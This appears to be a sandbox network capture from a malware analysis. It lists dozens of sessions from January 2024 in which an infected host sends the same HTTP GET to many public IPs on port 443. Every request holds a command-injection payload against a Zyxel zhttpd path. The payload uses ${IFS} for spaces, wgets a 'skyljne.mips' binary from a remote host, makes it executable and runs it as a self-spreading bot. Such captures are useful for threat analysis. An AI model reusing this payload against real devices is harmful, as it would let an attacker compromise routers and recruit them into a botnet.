                                          Jan 14, 2024 15:46:04.773226023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1754192.168.2.234704661.243.73.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773281097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1755192.168.2.2353230190.212.62.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773312092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1756192.168.2.2355152100.221.220.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773312092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1757192.168.2.234655677.134.231.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773372889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1758192.168.2.233896890.184.24.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773384094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1759192.168.2.23491829.120.68.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773458004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1760192.168.2.235529649.108.179.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773459911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1761192.168.2.234908685.129.160.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773499966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1762192.168.2.2344662133.82.61.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773502111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1763192.168.2.234495412.249.94.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773585081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1764192.168.2.2335418208.103.139.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773621082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1765192.168.2.233283827.249.148.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773653984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1766192.168.2.234060457.42.202.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773675919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1767192.168.2.233975244.83.122.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773694038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1768192.168.2.2345604178.203.185.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773756981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1769192.168.2.235704698.16.123.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773808002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1770192.168.2.233998275.176.16.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773812056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1771192.168.2.2334424210.201.190.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773857117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1772192.168.2.2337526141.18.102.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773909092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1773192.168.2.235768884.128.132.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773926973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1774192.168.2.2342660140.87.125.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773953915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1775192.168.2.2358664140.196.229.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.774002075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1776192.168.2.2360572166.168.122.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777362108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1777192.168.2.2338192132.31.209.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777363062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1778192.168.2.234835861.7.241.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777395010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1779192.168.2.2354326110.179.50.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777427912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1780192.168.2.233714865.116.180.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777457952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1781192.168.2.235190253.67.239.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777467966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1782192.168.2.2336002145.224.203.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777530909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1783192.168.2.2348006210.212.70.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777537107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1784192.168.2.2335504194.195.39.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777573109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1785192.168.2.2340508211.6.16.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.777576923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1786192.168.2.235905674.64.188.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.785839081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1787192.168.2.2349556180.121.167.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.785865068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1788192.168.2.234862660.201.145.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.785883904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1789192.168.2.2350622112.148.193.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.785931110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1790192.168.2.2357298135.127.16.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.785964012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1791192.168.2.235527071.159.153.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.785999060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1792192.168.2.235883882.109.148.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786019087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1793192.168.2.2352326116.246.166.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786087990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1794192.168.2.2349710158.169.202.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786122084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1795192.168.2.2344190161.70.16.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786137104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1796192.168.2.2342264183.35.213.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786180973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1797192.168.2.233438220.84.66.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786218882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1798192.168.2.2358718183.101.29.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786248922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1799192.168.2.2346780124.12.70.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786282063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1800192.168.2.2354834105.180.61.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786302090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1801192.168.2.2356402102.51.0.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786360979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1802192.168.2.233564493.244.248.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786437988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1803192.168.2.234742847.76.64.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786468983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1804192.168.2.2358404125.171.15.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786520958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1805192.168.2.2340718193.233.189.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786550045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1806192.168.2.2341488210.212.223.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786569118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1807192.168.2.235170663.253.153.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786611080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1808192.168.2.2344476101.96.84.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786648989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1809192.168.2.233787842.96.197.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786683083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1810192.168.2.2359880106.125.191.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786751986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1811192.168.2.234687635.157.92.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786753893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1812192.168.2.2353960140.144.160.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786782026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1813192.168.2.235010698.53.246.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786792994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1814192.168.2.23537308.105.40.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786814928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1815192.168.2.234001663.14.252.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786817074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1816192.168.2.234401653.127.5.10443
                                          TimestampBytes transferredDirectionData
